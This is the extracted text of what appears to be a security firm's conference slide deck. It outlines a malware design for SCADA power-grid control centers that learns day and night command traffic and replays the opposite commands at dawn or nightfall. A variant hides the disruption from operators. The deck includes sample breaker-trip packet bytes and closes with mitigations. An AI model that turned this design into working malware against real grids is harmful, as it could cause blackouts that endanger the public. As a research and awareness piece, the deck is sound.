www.c4-security.com

Eyal Udassin – C4 Security

www.c4-security.com

ContentsContents

Introduction

The Problem – Security by Obscurity

The Solution – Behavioral Attack

Recommendations

www.c4-security.com

About C4About C4 Based in IsraelBased in Israel

Consists of security experts, reverse engineers and Consists of security experts, reverse engineers and protocol analystsprotocol analysts

Provide “red team” penetration tests to utilities, financial Provide “red team” penetration tests to utilities, financial institutions and governmental agenciesinstitutions and governmental agencies

Our team’s skills enable us to find and exploit Our team’s skills enable us to find and exploit vulnerabilities in proprietary systemsvulnerabilities in proprietary systems

Experts in SCADA securityExperts in SCADA security

Contact: Contact: info@c4-security.cominfo@c4-security.com / / www.c4-security.comwww.c4-security.com

www.c4-security.com

IntroductionIntroduction TerminologyTerminology

SCADA – Supervisory Command and Data AcquisitionSCADA – Supervisory Command and Data Acquisition DCS – Distributed Control SystemsDCS – Distributed Control Systems

C&C Systems for electricity, water, sewage, C&C Systems for electricity, water, sewage, gas, oil, trains, petrochemical plants etc.gas, oil, trains, petrochemical plants etc.

Energy management systems (EMS) are SCADA Energy management systems (EMS) are SCADA systems as they control network nodes systems as they control network nodes dispersed over a large geographical areadispersed over a large geographical area

These systems bring power to your homeThese systems bring power to your home

www.c4-security.com

IntroductionIntroduction National infrastructure utilities directly affect National infrastructure utilities directly affect

the well-being of nations’ civilians, thus it is a the well-being of nations’ civilians, thus it is a prime target for terroristsprime target for terrorists

The “Holy Grail” for an attacker in the SCADA The “Holy Grail” for an attacker in the SCADA environment is the Control Centerenvironment is the Control Center

We strongly believe that in order to thwart We strongly believe that in order to thwart such attacks, it is necessary to conduct the such attacks, it is necessary to conduct the same offensive researchsame offensive research

www.c4-security.com

Typical Control Center ElementsTypical Control Center Elements

www.c4-security.com

BackgroundBackground 3 Critical vulnerabilities in GE-Fanuc 3 Critical vulnerabilities in GE-Fanuc

Cimplicity and Proficy were disclosed by us at Cimplicity and Proficy were disclosed by us at S4-2008 (including a stable heap overflow)S4-2008 (including a stable heap overflow)

Even this was the first time that taking Even this was the first time that taking control over the SCADA server was control over the SCADA server was demonstrated, there were a few engineers demonstrated, there were a few engineers who doubted that it would allow an attacker who doubted that it would allow an attacker to cause real damageto cause real damage

Skeptics fuel progress – time for stage II Skeptics fuel progress – time for stage II

www.c4-security.com

The ProblemThe ProblemThe #1 claim from big-scale SCADA operations is:The #1 claim from big-scale SCADA operations is:

Even if you assume complete control over our Even if you assume complete control over our control center – you will not be able to cause control center – you will not be able to cause substantial physical damage as:substantial physical damage as:

1. You’re not a control engineer, so you wont1. You’re not a control engineer, so you wont understand what you’re seeing on the HMI understand what you’re seeing on the HMI

2. You wont find any documentation on the2. You wont find any documentation on the network to allow you to map the SCADA network network to allow you to map the SCADA network addresses and their datapoints to their addresses and their datapoints to their “meaning” – what they control in the physical “meaning” – what they control in the physical world world

www.c4-security.com

The ProblemThe Problem Without a mapping of the addresses & datapoints Without a mapping of the addresses & datapoints

to physical locations and controlled devices, it is to physical locations and controlled devices, it is very difficult to generate malicious packetsvery difficult to generate malicious packets

Such a map can usually be found on the Such a map can usually be found on the operators workstations and the SCADA server as operators workstations and the SCADA server as a tag database. Each tag is a user friendly name a tag database. Each tag is a user friendly name given to an address/datapointgiven to an address/datapoint

““We keep the mapping only in paper copy” etc.We keep the mapping only in paper copy” etc.

Mmmm… strange, but let’s play alongMmmm… strange, but let’s play along

www.c4-security.com

Translation to IT Security TermsTranslation to IT Security Terms Security by obscuritySecurity by obscurity

To be completely honest – it’s one of To be completely honest – it’s one of the few places where it might the few places where it might actually work!actually work!

Two “shortcuts” to beating security Two “shortcuts” to beating security by obscurity are missing:by obscurity are missing: Can’t trigger eventsCan’t trigger events Few (if any) string anchorsFew (if any) string anchors

www.c4-security.com

Translation to IT Security TermsTranslation to IT Security Terms

Example packets:Example packets:

0a 07 d9 08 3b 92 0b af 00 0b0a 07 d9 08 3b 92 0b af 00 0b Trip a breaker (92ob) – address (d9083b)Trip a breaker (92ob) – address (d9083b)

0a 08 80 b5 cc 91 01 00 0b0a 08 80 b5 cc 91 01 00 0b Read generation frequency (9101) on plant #11 Read generation frequency (9101) on plant #11

– address (– address (80b5cc80b5cc))

www.c4-security.com

The SolutionThe Solution

Base assumptions:Base assumptions: The GoodThe Good

Assumption 1 – Security by obscurity works. We will Assumption 1 – Security by obscurity works. We will never know what the data “means”never know what the data “means”

Already discussedAlready discussed No “silver bullet” – can’t cause “aurora” style attack as No “silver bullet” – can’t cause “aurora” style attack as

we don’t what kind of generator is used nor where is it we don’t what kind of generator is used nor where is it located logicallylocated logically

Assumption 2 – Even if we’ll have the map, causing Assumption 2 – Even if we’ll have the map, causing substantial damage is difficultsubstantial damage is difficult

Complexity – mitigated by getting a control engineer on-Complexity – mitigated by getting a control engineer on-boardboard

Safety mechanisms – 3 cases in the past year where Safety mechanisms – 3 cases in the past year where these failed due to mechanical or human errorthese failed due to mechanical or human error

www.c4-security.com

Base Assumptions (cont.)Base Assumptions (cont.) The BadThe Bad

Assumption 3 – Control protocols are simpleAssumption 3 – Control protocols are simple 95% are Start/Stop, TLV, or fixed size and format95% are Start/Stop, TLV, or fixed size and format

Assumption 4 – We own the communication Assumption 4 – We own the communication server (aka FEP)server (aka FEP)

This is were we left off in our previous research, for This is were we left off in our previous research, for more details see: more details see:

http://www.c4-security.com/SCADA%20Security%20-%20Attack%20Vectors.pdfhttp://www.c4-security.com/SCADA%20Security%20-%20Attack%20Vectors.pdf

The UglyThe Ugly Assumption 5 - Humans need more electricity when Assumption 5 - Humans need more electricity when

they are awakethey are awake

www.c4-security.com

Daily Electricity DemandDaily Electricity Demand EnglandEngland

www.c4-security.com

Daily Electricity DemandDaily Electricity Demand The Czech RepublicThe Czech Republic

www.c4-security.com

Daily Electricity DemandDaily Electricity Demand ScotlandScotland

www.c4-security.com

Attack VectorAttack Vector The main goal of the control center is to keep the The main goal of the control center is to keep the

grid balance - generation should match the demandgrid balance - generation should match the demand

From the previous graphs we see that:From the previous graphs we see that: In the morning the grid utilization is increasedIn the morning the grid utilization is increased In the evening it is decreasedIn the evening it is decreased

How does this work to our advantage?How does this work to our advantage?

Let’s turn night into day, and vice versaLet’s turn night into day, and vice versa

No need to know what we’re sending as the No need to know what we’re sending as the operators already took care of that for usoperators already took care of that for us

www.c4-security.com

Malware DesignMalware Design Install malware on the comm. ServerInstall malware on the comm. Server Stage I – Learning ModeStage I – Learning Mode

Sniff traffic to and from the field (easy to Sniff traffic to and from the field (easy to distinguish)distinguish)

Create request/response pairs with a Create request/response pairs with a timestamp for day & night classificationtimestamp for day & night classification

Auto-identify “problematic” fieldsAuto-identify “problematic” fields CRC/Parity FieldsCRC/Parity Fields TimestampsTimestamps CountersCounters

Simple statistical computationsSimple statistical computations

www.c4-security.com

Malware DesignMalware Design Stage II – Active modeStage II – Active mode

When enough packet data is collected, When enough packet data is collected, wait for the next critical time of day wait for the next critical time of day (dawn, nightfall)(dawn, nightfall)

Drop all messages coming from the Drop all messages coming from the SCADA serverSCADA server

Instead, sent the commands of the Instead, sent the commands of the opposite timeframe to the fieldopposite timeframe to the field

www.c4-security.com

Malware DesignMalware Design What will happen in Active Mode?What will happen in Active Mode? Example – sunrise timeExample – sunrise time

Electricity demand constantly risesElectricity demand constantly rises The field devices will receive night-time The field devices will receive night-time

command – e.g. “disconnect aux. power plant command – e.g. “disconnect aux. power plant from the grid” , “lower power output from main from the grid” , “lower power output from main power plant” etc.power plant” etc.

Operators will try to connect more power plants, Operators will try to connect more power plants, without success as the commands are ignoredwithout success as the commands are ignored

Network instability – supply will not meet the Network instability – supply will not meet the demanddemand

Potentially causing blackoutsPotentially causing blackouts May change electric frequencyMay change electric frequency

www.c4-security.com

Advanced Attack VectorAdvanced Attack Vector An even nastier approach is to record An even nastier approach is to record

communication between the comm. server and communication between the comm. server and SCADA server as wellSCADA server as well

When the systems goes from “learn mode” to When the systems goes from “learn mode” to “active mode” perform two actions:“active mode” perform two actions: Send the control data to the field as Send the control data to the field as

previously mentionedpreviously mentioned Don’t drop the SCADA server requests, send Don’t drop the SCADA server requests, send

responses which it expects at this time from responses which it expects at this time from the fieldthe field

www.c4-security.com

Advanced Attack VectorAdvanced Attack Vector Expected resultExpected result

Field devices are performing the exact Field devices are performing the exact opposite of their required behavioropposite of their required behavior

SCADA operators see that everything is SCADA operators see that everything is running smoothlyrunning smoothly

www.c4-security.com

Design AdvantagesDesign Advantages

Little to zero knowledge on the Little to zero knowledge on the network design and implementation network design and implementation is requiredis required

One time insertion of the malware, One time insertion of the malware, no need for ongoing communicationsno need for ongoing communications

Physical impact is likelyPhysical impact is likely

www.c4-security.com

DrawbacksDrawbacks There are always exceptionsThere are always exceptions

““We sign all messages” - ~<1%, very We sign all messages” - ~<1%, very modernmodern

Unique network architecturesUnique network architectures Prior knowledge of the protocols used will Prior knowledge of the protocols used will

greatly increase the chance of impact as greatly increase the chance of impact as the “learn mode” will be well definedthe “learn mode” will be well defined

Independent safety controls will alert the Independent safety controls will alert the operators, and operators, and mightmight contain the damage contain the damage to a certain degreeto a certain degree

Looking for guinea pigs!Looking for guinea pigs!

www.c4-security.com

RecommendationsRecommendations RelaxRelax

Not FUD. It’s not going to happen tomorrowNot FUD. It’s not going to happen tomorrow Not to be underestimated though - Not to be underestimated though -

acknowledged by control center engineers acknowledged by control center engineers from 3 T&D utilitiesfrom 3 T&D utilities

The goal is to increase awareness of the The goal is to increase awareness of the importance of securing your SCADA networkimportance of securing your SCADA network

www.c4-security.com

RecommendationsRecommendations Several potential mitigationsSeveral potential mitigations

Strong authentication of messages between Strong authentication of messages between the SCADA server and communication serverthe SCADA server and communication server

Field communication solutionsField communication solutions Encrypt or digitally sign messagesEncrypt or digitally sign messages Obfuscation with key swap every X days (Rrushi – Obfuscation with key swap every X days (Rrushi –

S4 2007)S4 2007) Chaffing – switch live/simulation between two FEPs Chaffing – switch live/simulation between two FEPs

every dayevery day

These solutions address the question – “How These solutions address the question – “How do I minimize the damage to my assets, even do I minimize the damage to my assets, even after my control center is compromised?”after my control center is compromised?”

www.c4-security.com

SummarySummary Choose your field protocols with security in mindChoose your field protocols with security in mind

Asset owners - demand quality software, which Asset owners - demand quality software, which undergoes an ongoing assessment of its resilience undergoes an ongoing assessment of its resilience to attackto attack

And on top of that - prevent control center And on top of that - prevent control center compromise (assumption #4). Be prepared, audit compromise (assumption #4). Be prepared, audit yourselves!yourselves!

““All that is necessary for evil to triumph is for good All that is necessary for evil to triumph is for good men to do nothing”men to do nothing”

Edmund Burke, 1770Edmund Burke, 1770

www.c4-security.com